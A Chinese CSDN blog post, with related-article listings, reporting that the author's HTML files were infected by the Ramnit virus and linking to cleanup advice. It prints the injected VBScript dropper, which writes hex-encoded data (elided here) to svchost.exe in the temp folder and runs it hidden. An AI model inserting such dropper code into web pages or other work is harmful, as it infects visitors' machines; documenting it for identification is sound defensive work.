ramnit病毒

最新推荐文章于 2023-07-22 16:51:16 发布
最新推荐文章于 2023-07-22 16:51:16 发布
阅读量9.2k 收藏 3
点赞数 1
分类专栏: E计算机理论 文章标签: 病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guangheultimate/article/details/52678468
版权
在使用Hbuilder时,发现HTML文件被植入ramnit病毒,表现为含有VBScript的恶意代码。该病毒为感染型,需断开网络防止反复感染,并采取一系列措施进行清理和查杀。包括:漏洞修复、系统防黑加固、设置强口令以及使用最新版360杀毒软件全盘扫描。
摘要由CSDN通过智能技术生成

今天打开Hbuilder,发现每个html文档都有如下代码:


<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData =4B3F9................................................................0FAB3F-------无数个十六进制字符

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

//--></SCRIPT>


网上搜索是电脑中的ramnit病毒


最低0.47元/天 解锁文章
光何
关注
专栏目录
Ramnit感染型病毒分析与处置
不忘初心,护天下安全!
08-03 4785
详细分析Ramnit感染性病毒
[样本分析] Ramnit感染型病毒
qq_42814021的博客
01-14 4373
文章目录样本信息样本行为详细分析样本行为 样本信息 MD5:ff5e1f27193ce51eec318714ef038bef 类型:exe32 分析工具:DIE、火绒剑、OD、x32dbg、IDA 样本行为 详细分析 拿到样本之后,先拖到DIE中看一下,发现有UPX壳。 直接脱壳: 脱壳成功后,用IDA打开,发现入口处是无意义的函数调用: 阅读其他分析文章发现是需要先解密然后再脱一次壳,暂时搞不太懂。 直接根据参考的分析文章上的EP脱壳,竟然成功了。之后有时间再看解密,先继续分析。 样本行为 入口处主
Ramnit病毒简介
si1ence的博客
01-11 1万+
0x0 背景 1、Ramnit 病毒的网页传播方式 在被植入了 Ramnit 病毒的主机中,病毒会感染主机中的 .html 或 .htm 后缀的网页,在 .html 或 .htm 文件中添加如下的 vbs 攻击代码: 当使用低版本或安全策略配置不当的 IE 浏览器访问被 Ramnit 感染的 html 网页时,感染 html 网页的 vbs 攻击代码将被执行,创建并运行 Ramnit 病毒。继而 Ramnit 病毒会感染访问者本地计算机的 html 文件,从而形成蠕虫的自动...
Ramnit病毒分析
好好学习,天天向上
06-25 2991
Ramnit病毒是一个相对古老的病毒,使用会感染系统内的exe和html文件,通过文件分发和U盘传播。
Ramnit蠕虫
swordheart的博客
01-23 6542
Ramnit蠕虫 1、病毒简介 Ramnit 是一个典型的VBScript蠕虫病毒,能够通过网页挂马的方式进行传播,用户在浏览器中浏览挂载该恶意代码的HTML页面后并点击加载ActiveX控件后主机就有可能受到恶意代码的感染 2、病毒危害 Ramnit病毒可以监控网络访问活动等,可能导致网上银行交易等信息的泄露或盗取;该病毒还可以扫描和浏览服务器中的文件系统,获取敏感的文件信息;此外该病毒通过控制某台计算机可以作为攻击者的跳板对整个内部网络造成危害。 3、终端验证 1、文件 在被植入了
互联网做项目,一定要注意网络安全,不能中蠕虫ramnit.x病毒
热门推荐
青峰客
05-18 2万+
    今远程操作国外客户电脑的时候,发现其电脑中了病毒!蠕虫病毒,virus.win32.ramnit.x,软件刚开始还能使用,接着在用的时候就会失灵,仔细一看感染病毒了! virus.win32.ramnit.x病毒感染全盘EXE HTM HTML DLL文件,感染后的EXE运行后会在该EXE同目录下生成一个55kb或111kb大小的无图标病毒文件(55kb是第一次运行,第二次运行就变成...
Virus.Win32.Ramnit.X专杀工具
07-09
Virus.Win32.Ramnit 是一种恶意软件,属于Windows平台上的蠕虫病毒,它具有高度的传染性和破坏性。该病毒家族包括多种变种,如 Virus.Win32.Ramnit.X、Virus.Win32.Ramnit.a 和 Virus.Win32.Ramnit.b,这些变种可能...
symantec FxRamnit专杀工具 Virus.Win32.Ramnit.X专杀工具.zip
07-28
Symantec FxRamnit专杀工具:virus.win32.ramnit.x病毒专杀,该病毒感染全盘EXE HTM HTML DLL文件,感染后的EXE运行后会在该EXE同目录下生成一个同名+srv.exe文件,使用本工具可以真实清除并修复破坏的文件。...
Ramnit感染型病毒创建傀儡进程的方法
weixin_44156885的博客
06-17 523
Ramnit感染型病毒创建傀儡进程的方法 样本信息: MD5: FF5E1F27193CE51EEC318714EF038BEF SHA1: B4FA74A6F4DAB3A7BA702B6C8C129F889DB32CA6 1,查找默认浏览器 如果有默认浏览器则将默认浏览器作为傀儡进程,如果没有则使用IE浏览器 2,HOOK ntdll.ZwWriteVirtualMemory()函数 使用inline hook的方式HOOK ntdll.ZwWriteVirtualMemory()函数 hook之前暂
解决virus:win32/ramnit.a病毒
庐陵居士
05-30 2842
现在导航到C:C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service。在这里,通过在键盘上按下 Shift + Del来删除DetectionHistory文件夹。转到顶部的"查看"选项卡并勾选"隐藏项"选项。按下win+E打开文件资源管理器。
解决virus.vbs.wiritebin.a和Virus.Win32.Ramin.x病毒
sanqima的专栏
07-13 1万+
virus.vbs.writebin.a是一种VB脚本木马病毒,该病毒会在电脑磁盘上篡改html、exe、dll这3种文件;Virus.Win32.Ramin.x也是一种木马病毒,它主要感人exe、dll这2中文件。 ...
分析恶意Windows程序
最新发布
weixin_51758733的博客
07-22 726
分析恶意代码Windows程序
Ramnint 病毒
kasteluo的专栏
12-18 497
Ramnint 病毒 (vbs.writebin.a ) 现象: 1. 感染 dll,exe,html htm 文件 2. 在感染的exe目录生成AppName+Srv.exe病毒(112kb); 3. 被感染的html文件,运行后,生成svchost.exe 文件。 4.进程中多出了 Srv.exe  5. 病毒盘中感染后的html文件会在末尾添加 如下代码: <!
同事发来的文件是个html,逮到一个疑是感染html,htm,网页文件的木马
weixin_29666489的博客
06-16 478
事情是这样子的远程帮同事搞进销存软件 ,发现软件打开不正常了如图"在此页上的ActiveX控件和本页上的其它部分的交互可能不安全“我选择继续,是如下图“当前页面脚本发生错误。%1不是有效的win32应用程序。”这里我要说一下的,IE浏览器我都是设置过的,正常情况下进入这个页面是不会有这两个提示的我觉得哪里有猫腻,我按提示路径找到那个html文件,发现如下在html文件尾部被添加了如下代码[Visu...
感染ramnit家族蠕虫的处置建议和方法
qq_51068285的博客
02-27 2807
ranmit家族蠕虫
html感染型病毒
a439017985的博客
10-16 2万+
病毒种类:该病毒属于ramnit感染型病毒。 中毒症状:会在html文件最后强制插入一下代码,并感染全盘html文档。 DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000
2017年Cisco网络安全报告:攻击与防御的角力
8. 恶意软件进化:通过六个月的观察,恶意软件的演变速度加快,如Nemucod、Ramnit、Kryptik和Fareit等。 9. 时间到检测(Time-to-Detection, TTD):报告追踪了攻击者和防御者之间TTD的拉锯战,强调了快速响应的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值